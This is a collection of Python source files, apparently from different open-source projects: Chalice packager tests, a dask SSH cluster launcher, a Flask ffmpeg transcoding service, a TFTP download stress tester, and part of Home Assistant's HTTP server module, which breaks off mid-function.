config_from_disk={
'project_dir': basic_app,
'layers': ['hello', 'world', 'layers'],
'automatic_layer': True
}
)
def dummy_scope(stage, function):
return config
config.scope = dummy_scope
return config
@pytest.fixture
def layer_downloader(self):
layer_downloader = mock.Mock(spec=LambdaLayerDownloader)
layer_downloader.download_all.return_value = [
'hello.zip', 'world.zip', 'layers.zip'
]
return layer_downloader
@pytest.fixture
def app_packager(self):
app_packager = mock.Mock(spec=LambdaDeploymentPackager)
app_packager.create_deployment_package.return_value = "app.zip"
return app_packager
@pytest.fixture
def layer_packager(self):
layer_packager = mock.Mock(spec=LayerDeploymentPackager)
layer_packager.create_deployment_package.return_value = "layer.zip"
return layer_packager
@pytest.fixture
def docker_packager(self, config, osutils, app_packager,
layer_packager, layer_downloader):
return DockerPackager(config, osutils, app_packager,
layer_packager, layer_downloader)
@pytest.fixture
def osutils(self):
osutils = mock.Mock(spec=OSUtils)
osutils.joinpath = os.path.join
osutils.makedirs = os.makedirs
osutils.directory_exists.return_value = False
osutils.file_exists.return_value = False
return osutils
class DummyLambda(LambdaFunction):
def __init__(self, handler, function_name):
self.handler = handler
self.function_name = function_name
self.resource_name = function_name
def test_package_app_not_existing(self, basic_app, osutils, config,
app_packager, docker_packager):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
path = docker_packager.package_app()
files = os.listdir(cache_dir)
assert "app" in files
expected_path = os.path.join(cache_dir, "app")
assert path == expected_path
assert osutils.extract_zipfile.called_with("app", expected_path)
python_version = config.lambda_python_version
app_packager.create_deployment_package.assert_called_with(
basic_app, python_version)
def test_package_app_already_exists(self, basic_app, osutils, config,
app_packager, docker_packager):
osutils.directory_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
os.makedirs(cache_dir)
path = docker_packager.package_app()
files = os.listdir(cache_dir)
assert len(files) == 0
expected_path = os.path.join(cache_dir, "app")
assert path == expected_path
osutils.extract_zipfile.assert_not_called()
def test_package_layers_no_auto_layer(self, basic_app, osutils, config,
layer_packager, docker_packager):
osutils.directory_exists = os.path.isdir
with cd(basic_app):
prefix = os.path.join(basic_app, ".chalice",
"deployments", "layers-")
lambdas = [
self.DummyLambda("1", "a"),
self.DummyLambda("2", "b"),
self.DummyLambda("3", "c"),
]
path_map = docker_packager.package_layers(lambdas)
assert len(path_map) == 3
assert path_map["a"] == path_map["b"] == path_map["c"]
assert path_map["a"].startswith(prefix)
python_version = config.lambda_python_version
assert path_map["a"].endswith("-" + python_version)
layer_packager.create_deployment_package.assert_not_called()
def test_package_layers_with_auto_layer(self, basic_app, osutils,
autolayer_config, app_packager,
layer_packager, layer_downloader):
docker_packager = DockerPackager(autolayer_config, osutils,
app_packager, layer_packager,
layer_downloader)
with cd(basic_app):
docker_packager.package_layers([self.DummyLambda("1", "a")])
python_version = autolayer_config.lambda_python_version
layer_packager.create_deployment_package.assert_called_with(
basic_app, python_version)
def test_create_layer_directory_not_existing(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers")
python_version = config.lambda_python_version
assert files[0].endswith("-" + python_version)
expected_path = os.path.join(cache_dir, files[0])
assert path == expected_path
unzip_calls = [
mock.call("/path", path),
mock.call("hello.zip", path),
mock.call("world.zip", path),
mock.call("layers.zip", path)
]
osutils.extract_zipfile.assert_has_calls(unzip_calls)
assert osutils.extract_zipfile.call_count == 4
layer_downloader.download_all.assert_called_with(layer_arns,
cache_dir)
def test_create_layer_directory_already_exists(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
osutils.directory_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
os.makedirs(cache_dir)
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 0
expected_prefix = os.path.join(cache_dir, "layers-")
assert path.startswith(expected_prefix)
python_version = config.lambda_python_version
assert path.endswith("-" + python_version)
osutils.extract_zipfile.assert_not_called()
def test_create_layer_directory_no_autolayer(self, basic_app, config,
docker_packager, osutils,
layer_downloader):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
layer_arns = ["arn1", "arn2", "arn3"]
path = docker_packager.create_layer_directory(layer_arns, "")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers")
python_version = config.lambda_python_version
assert files[0].endswith("-" + python_version)
expected_path = os.path.join(cache_dir, files[0])
assert path == expected_path
unzip_calls = [
mock.call("hello.zip", path),
mock.call("world.zip", path),
mock.call("layers.zip", path)
]
osutils.extract_zipfile.assert_has_calls(unzip_calls)
assert osutils.extract_zipfile.call_count == 3
layer_downloader.download_all.assert_called_with(layer_arns,
cache_dir)
def test_create_layer_directory_different_output_on_autolayer_mismatch(
self, basic_app, docker_packager, osutils):
osutils.directory_exists = os.path.isdir
with cd(basic_app):
layer_arns = ["arn1", "arn2", "arn3"]
path1 = docker_packager.create_layer_directory(layer_arns, "")
path2 = docker_packager.create_layer_directory(layer_arns, "path")
assert path1 != path2
def test_create_layer_directory_does_not_raise_filename_too_long(
self, basic_app, layer_downloader, docker_packager, osutils):
with cd(basic_app):
cache_dir = os.path.join(basic_app, ".chalice", "deployments")
filename = "zip" * 25
layer_arns = [filename, filename, filename, filename, filename]
docker_packager.create_layer_directory(layer_arns, "/path")
files = os.listdir(cache_dir)
assert len(files) == 1
assert files[0].startswith("layers-")
def test_creates_cache_dir_if_nonexistent(
self, osutils, docker_packager, basic_app):
osutils.directory_exists.return_value = False
with cd(basic_app):
docker_packager.package_app()
chalice_dir = os.path.join(basic_app, ".chalice")
assert 'deployments' in os.listdir(chalice_dir)
|
old_ssh.py
|
import logging
import os
import socket
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from tlz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import PasswordRequiredException, SSHException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=30,
banner_timeout=30,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection error when connecting to {addr}:{port}"
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ f"Retrying... (attempt {retries}/3)"
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ line
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b"\x03") # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(
logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None
):
cmd = "{python} -m distributed.cli.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}:{port}.log".format(
addr=addr, port=port, logdir=logdir
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = f"{bcolors.BOLD}scheduler {addr}:{port}{bcolors.ENDC}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(
logdir,
scheduler_addr,
scheduler_port,
worker_addr,
nthreads,
nprocs,
ssh_username,
ssh_port,
ssh_private_key,
nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--nthreads {nthreads}" + (" --nprocs {nprocs}" if nprocs != 1 else "")
)
if not nohost:
cmd += " --host {worker_addr}"
if memory_limit:
cmd += " --memory-limit {memory_limit}"
if worker_port:
cmd += " --worker-port {worker_port}"
if nanny_port:
cmd += " --nanny-port {nanny_port}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port,
)
if local_directory is not None:
cmd += " --local-directory {local_directory}".format(
local_directory=local_directory
)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}.log".format(
addr=worker_addr, logdir=logdir
)
label = f"worker {worker_addr}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
class SSHCluster:
def __init__(
self,
scheduler_addr,
scheduler_port,
worker_addrs,
nthreads=0,
nprocs=1,
ssh_username=None,
ssh_port=22,
ssh_private_key=None,
nohost=False,
logdir=None,
remote_python=None,
memory_limit=None,
worker_port=None,
nanny_port=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
self.local_directory = local_directory
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(
logdir,
"dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
)
print(
bcolors.WARNING + "Output will be redirected to logfiles "
'stored locally on individual worker nodes under "{logdir}".'.format(
logdir=logdir
)
+ bcolors.ENDC
)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(
logdir,
scheduler_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return "%s:%d" % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
print(process["output_queue"].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(
start_worker(
self.logdir,
self.scheduler_addr,
self.scheduler_port,
address,
self.nthreads,
self.nprocs,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker,
self.local_directory,
)
)
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
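# Minimal usage sketch of the SSHCluster helper defined above. The addresses,
# SSH key path and log directory are placeholders, not values from any real
# deployment.
def example_ssh_cluster():
    with SSHCluster(
        scheduler_addr="192.168.0.10",
        scheduler_port=8786,
        worker_addrs=["192.168.0.11", "192.168.0.12"],
        nthreads=4,
        ssh_username="dask",
        ssh_private_key="~/.ssh/id_rsa",
        logdir="/tmp/dask-ssh-logs",
    ) as cluster:
        # Echo remote stdout/stderr until Ctrl-C; __exit__ then puts "shutdown"
        # on every remote process's input queue and joins its thread.
        cluster.monitor_remote_processes()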
|
app.py
|
import boto3
import io
import os
import requests
from subprocess import run, PIPE
from flask import Flask
from flask_restful import Resource, Api, reqparse
from threading import Thread
from uuid import uuid4
from tempfile import mkdtemp
# Never put credentials in your code!
from dotenv import load_dotenv
load_dotenv()
# Obtain B2 S3 compatible client
s3 = boto3.client(service_name='s3',
endpoint_url=os.environ['B2_ENDPOINT_URL'],
aws_access_key_id=os.environ['B2_APPLICATION_KEY_ID'],
aws_secret_access_key=os.environ['B2_APPLICATION_KEY'])
bucket_name = os.environ['BUCKET_NAME']
app = Flask(__name__)
api = Api(app)
parser = reqparse.RequestParser()
parser.add_argument('inputObject', required=True)
parser.add_argument('webhook', required=True)
def transcode(inputObject, webhook):
input_key = inputObject
# Unfortunately, we can't stream the B2 object into ffmpeg, since many video
# formats require ffmpeg to seek around the data to decode it
input_file = os.path.join(mkdtemp(), str(uuid4()))
print(f'Downloading s3://{bucket_name}/{input_key} to {input_file}')
s3.download_file(bucket_name, input_key, input_file)
output_file = input_file + '.mp4'
command = f'ffmpeg -i {input_file} -c:a copy -s hd720 -preset superfast -y {output_file}'
print(f'Running {command}', flush=True)
# Have to run in a shell to make this work in a worker thread
cp = run(command, shell=True)
print(f'Exit status {cp.returncode}')
if cp.returncode == 0:
output_key = os.path.splitext(input_key)[0]+'.mp4'
print(f'Uploading {output_file} to s3://{bucket_name}/{output_key}')
s3.upload_file(output_file, os.environ['BUCKET_NAME'], output_key)
response = {
'status': 'success',
'inputObject': input_key,
'outputObject': output_key
}
else:
response = {
'status': 'failure',
'inputObject': input_key
}
print(f'POSTing {response} to {webhook}')
r = requests.post(webhook, json=response)
print(f'Status code {r.status_code}')
class Videos(Resource):
def post(self):
args = parser.parse_args()
thread = Thread(target=transcode, kwargs={**args})
thread.start()
return {'status': 'transcoding'}, 200
api.add_resource(Videos, '/videos')
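# Client-side sketch of calling the /videos endpoint defined above. The service
# URL, object key and webhook URL are placeholders; the endpoint responds with
# {'status': 'transcoding'} immediately and later POSTs the final result to the
# supplied webhook.
def submit_transcode_job():
    resp = requests.post(
        'http://localhost:5000/videos',
        data={
            'inputObject': 'incoming/sample.mov',
            'webhook': 'https://example.com/hooks/transcode-done',
        },
    )
    return resp.json()  # {'status': 'transcoding'}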
if __name__ == '__main__':
app.run()
|
tftp_stress_test.py
|
import datetime
import os
import sys
import time
import logger
from optparse import OptionParser
from multiprocessing import Process, JoinableQueue, Queue
import queue
import tftpy
from random import randint
my_logger = logger.getLogger("TftpStress")
download_file_names = [
"BOOT",
"boot_emmc-boot.scr",
"boot_emmc-gpt.cmd",
"boot_emmc-recovery.cmd",
"boot_emmc-rootfs_rw.scr",
"boot_emmc-system.scr",
"data.1-of-1.gz",
"partition16G_ro.xml",
"rootfs.2-of-10.gz",
"rootfs.6-of-10.gz",
"rootfs_rw.1-of-1.gz",
"system.3-of-8.gz",
"system.7-of-8.gz",
"boot.1-of-1.gz",
"boot_emmc.cmd",
"boot_emmc-gpt.scr",
"boot_emmc-recovery.scr",
"boot_emmc-rootfs.scr",
"boot.scr",
"fip.bin",
"recovery.1-of-1.gz",
"rootfs.3-of-10.gz",
"rootfs.7-of-10.gz",
"spi_flash.bin",
"system.4-of-8.gz",
"system.8-of-8.gz",
"boot.cmd",
"boot_emmc-data.cmd",
"boot_emmc-misc.cmd",
"boot_emmc-rootfs.cmd",
"boot_emmc.scr",
"boot_spif.cmd",
"gpt.gz",
"rootfs.10-of-10.gz",
"rootfs.4-of-10.gz",
"rootfs.8-of-10.gz",
"system.1-of-8.gz",
"system.5-of-8.gz",
"tftp.MD",
"boot_emmc-boot.cmd",
"boot_emmc-data.scr",
"boot_emmc-misc.scr",
"boot_emmc-rootfs_rw.cmd",
"boot_emmc-system.cmd",
"boot_spif.scr",
"misc.1-of-1.gz",
"rootfs.1-of-10.gz",
"rootfs.5-of-10.gz",
"rootfs.9-of-10.gz",
"system.2-of-8.gz",
"system.6-of-8.gz"
]
def get_next_file():
idx = randint(0, len(download_file_names)-1)
return download_file_names[idx]
def tftp_downloader(name, rq, host, port, blksize, tsize, localip, timeout ):
"""
post get_open_lock by process
:param name:
:param ip:
:param group_id:
:param total:
:param delay:
:return:
"""
while True:
name = get_next_file()
output_name = "%s_dw" %(name)
tftp_options = {}
tftp_options['timeout'] = int(timeout)
if blksize:
tftp_options['blksize'] = int(blksize)
if tsize:
tftp_options['tsize'] = 0
tclient = tftpy.TftpClient(host,
int(port),
tftp_options,
localip)
class Progress(object):
def __init__(self, out):
self.progress = 0
self.out = out
def progresshook(self, pkt):
if isinstance(pkt, tftpy.TftpPacketTypes.TftpPacketDAT):
self.progress += len(pkt.data)
#self.out("Transferred %d bytes" % self.progress)
elif isinstance(pkt, tftpy.TftpPacketTypes.TftpPacketOACK):
#self.out("Received OACK, options are: %s" % pkt.options)
pass
progresshook = Progress(my_logger.info).progresshook
try:
tclient.download(name,
output_name,
progresshook)
rq.put('OK: %s' %(name))
except tftpy.TftpException as err:
sys.stderr.write("%s\n" % str(err))
my_logger.error("下载出错,退出压测程序")
sys.exit(1)
except KeyboardInterrupt:
pass
def statics(name, rq):
# Drain the result queue once a second and keep running totals of results.
ok_cnts = 0
ng_cnts = 0
while True:
time.sleep(1)
while not rq.empty():
if rq.get().startswith('OK'):
ok_cnts += 1
else:
ng_cnts += 1
my_logger.info("%s: downloads ok=%d ng=%d" % (name, ok_cnts, ng_cnts))
def download_stress(max_tasks, host, port, blksize, tsize, localip, timeout):
result_queue = Queue()
processes = []
# Create the statistics process
sp = Process(target=statics, args=("sp", result_queue))
# Create the downloader processes
for i in range(max_tasks):
p = Process(target=tftp_downloader, args=("dp", result_queue, host, port, blksize, tsize, localip, timeout))
processes.append(p)
sp.start()
for p in processes:
p.start()
sp.join()
for p in processes:
p.join()
def main():
usage = ""
parser = OptionParser(usage=usage)
parser.add_option('-i',
'--host',
type='string',
help='server ip',
default="192.168.1.99")
parser.add_option('-p',
'--port',
type='int',
help='tftp port (default: 69)',
default=69)
parser.add_option('-b',
'--blksize',
type='int',
default=512,
help='udp packet size to use (default: 512)')
parser.add_option('-n',
'--max_tasks',
type='int',
help='number of concurrent download processes',
default=1)
parser.add_option('-d',
'--max_download_speed',
type='int',
help='concurrent download speed limit',
default=1)
parser.add_option('-T',
'--timeout',
type='int',
help='transfer timeout in seconds',
default=7)
parser.add_option('-t',
'--tsize',
action='store_true',
default=False,
help="ask client to send tsize option in download")
parser.add_option('-l',
'--localip',
action='store',
dest='localip',
default="",
help='local IP for client to bind to (ie. interface)')
options, args = parser.parse_args()
download_stress(options.max_tasks, options.host, options.port, options.blksize, options.tsize, options.localip, options.timeout)
if __name__ == '__main__':
main()
|
http.py
|
"""
This module provides WSGI application to serve the Home Assistant API.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/http/
"""
import hmac
import json
import logging
import mimetypes
import threading
import re
import ssl
import voluptuous as vol
import homeassistant.remote as rem
from homeassistant import util
from homeassistant.const import (
SERVER_PORT, HTTP_HEADER_HA_AUTH, HTTP_HEADER_CACHE_CONTROL,
HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN, CONTENT_TYPE_JSON,
HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS, ALLOWED_CORS_HEADERS,
EVENT_HOMEASSISTANT_STOP, EVENT_HOMEASSISTANT_START)
from homeassistant.core import split_entity_id
import homeassistant.util.dt as dt_util
import homeassistant.helpers.config_validation as cv
from homeassistant.components import persistent_notification
DOMAIN = 'http'
REQUIREMENTS = ('cherrypy==8.1.0', 'static3==0.7.0', 'Werkzeug==0.11.11')
CONF_API_PASSWORD = 'api_password'
CONF_APPROVED_IPS = 'approved_ips'
CONF_SERVER_HOST = 'server_host'
CONF_SERVER_PORT = 'server_port'
CONF_DEVELOPMENT = 'development'
CONF_SSL_CERTIFICATE = 'ssl_certificate'
CONF_SSL_KEY = 'ssl_key'
CONF_CORS_ORIGINS = 'cors_allowed_origins'
DATA_API_PASSWORD = 'api_password'
NOTIFICATION_ID_LOGIN = 'http-login'
# TLS configuration follows the best-practice guidelines specified here:
# https://wiki.mozilla.org/Security/Server_Side_TLS
# Intermediate guidelines are followed.
SSL_VERSION = ssl.PROTOCOL_SSLv23
SSL_OPTS = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
if hasattr(ssl, 'OP_NO_COMPRESSION'):
SSL_OPTS |= ssl.OP_NO_COMPRESSION
CIPHERS = "ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:" \
"ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:" \
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:" \
"DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:" \
"ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:" \
"ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:" \
"ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:" \
"ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:" \
"DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:" \
"DHE-RSA-AES256-SHA:ECDHE-ECDSA-DES-CBC3-SHA:" \
"ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES128-GCM-SHA256:" \
"AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:" \
"AES256-SHA:DES-CBC3-SHA:!DSS"
_FINGERPRINT = re.compile(r'^(.+)-[a-z0-9]{32}\.(\w+)$', re.IGNORECASE)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_API_PASSWORD): cv.string,
vol.Optional(CONF_SERVER_HOST): cv.string,
vol.Optional(CONF_SERVER_PORT, default=SERVER_PORT):
vol.All(vol.Coerce(int), vol.Range(min=1, max=65535)),
vol.Optional(CONF_DEVELOPMENT): cv.string,
vol.Optional(CONF_SSL_CERTIFICATE): cv.isfile,
vol.Optional(CONF_SSL_KEY): cv.isfile,
vol.Optional(CONF_CORS_ORIGINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_APPROVED_IPS): vol.All(cv.ensure_list, [cv.string])
}),
}, extra=vol.ALLOW_EXTRA)
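# Illustrative only: a config dict the schema above accepts (the values are made
# up). Calling CONFIG_SCHEMA(...) returns the validated, coerced config or
# raises vol.Invalid on bad input.
def _example_http_config():
    return CONFIG_SCHEMA({
        DOMAIN: {
            CONF_API_PASSWORD: 'not-a-real-password',
            CONF_SERVER_PORT: 8123,
            CONF_CORS_ORIGINS: ['https://dashboard.example.com'],
            CONF_APPROVED_IPS: ['192.168.1.15'],
        }
    })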
class HideSensitiveFilter(logging.Filter):
"""Filter API password calls."""
# pylint: disable=too-few-public-methods
def __init__(self, hass):
"""Initialize sensitive data filter."""
super().__init__()
self.hass = hass
def filter(self, record):
"""Hide sensitive data in messages."""
if self.hass.wsgi.api_password is None:
return True
record.msg = record.msg.replace(self.hass.wsgi.api_password, '*******')
return True
def setup(hass, config):
"""Set up the HTTP API and debug interface."""
_LOGGER.addFilter(HideSensitiveFilter(hass))
conf = config.get(DOMAIN, {})
api_password = util.convert(conf.get(CONF_API_PASSWORD), str)
server_host = conf.get(CONF_SERVER_HOST, '0.0.0.0')
server_port = conf.get(CONF_SERVER_PORT, SERVER_PORT)
development = str(conf.get(CONF_DEVELOPMENT, '')) == '1'
ssl_certificate = conf.get(CONF_SSL_CERTIFICATE)
ssl_key = conf.get(CONF_SSL_KEY)
cors_origins = conf.get(CONF_CORS_ORIGINS, [])
approved_ips = conf.get(CONF_APPROVED_IPS, [])
server = HomeAssistantWSGI(
hass,
development=development,
server_host=server_host,
server_port=server_port,
api_password=api_password,
ssl_certificate=ssl_certificate,
ssl_key=ssl_key,
cors_origins=cors_origins,
approved_ips=approved_ips
)
def start_wsgi_server(event):
"""Start the WSGI server."""
server.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_wsgi_server)
def stop_wsgi_server(event):
"""Stop the WSGI server."""
server.stop()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_wsgi_server)
hass.wsgi = server
hass.config.api = rem.API(server_host if server_host != '0.0.0.0'
else util.get_local_ip(),
api_password, server_port,
ssl_certificate is not None)
return True
def request_class():
"""Generate request class.
Done in method because of imports.
"""
from werkzeug.exceptions import BadRequest
from werkzeug.wrappers import BaseRequest, AcceptMixin
from werkzeug.utils import cached_property
class Request(BaseRequest, AcceptMixin):
"""Base class for incoming requests."""
@cached_property
def json(self):
"""Get the result of json.loads if possible."""
if not self.data:
return None
# elif 'json' not in self.environ.get('CONTENT_TYPE', ''):
# raise BadRequest('Not a JSON request')
try:
return json.loads(self.data.decode(
self.charset, self.encoding_errors))
except (TypeError, ValueError):
raise BadRequest('Unable to read JSON request')
return Request
def routing_map(hass):
"""Generate empty routing map with HA validators."""
from werkzeug.routing import Map, BaseConverter, ValidationError
class EntityValidator(BaseConverter):
"""Validate entity_id in urls."""
regex = r"(\w+)\.(\w+)"
def __init__(self, url_map, exist=True, domain=None):
"""Initilalize entity validator."""
super().__init__(url_map)
self._exist = exist
self._domain = domain
def to_python(self, value):
"""Validate entity id."""
if self._exist and hass.states.get(value) is None:
raise ValidationError()
if self._domain is not None and \
split_entity_id(value)[0] != self._domain:
raise ValidationError()
return value
def to_url(self, value):
"""Convert entity_id for a url."""
return value
class DateValidator(BaseConverter):
"""Validate dates in urls."""
regex = r'\d{4}-\d{1,2}-\d{1,2}'
def to_python(self, value):
"""Validate and convert date."""
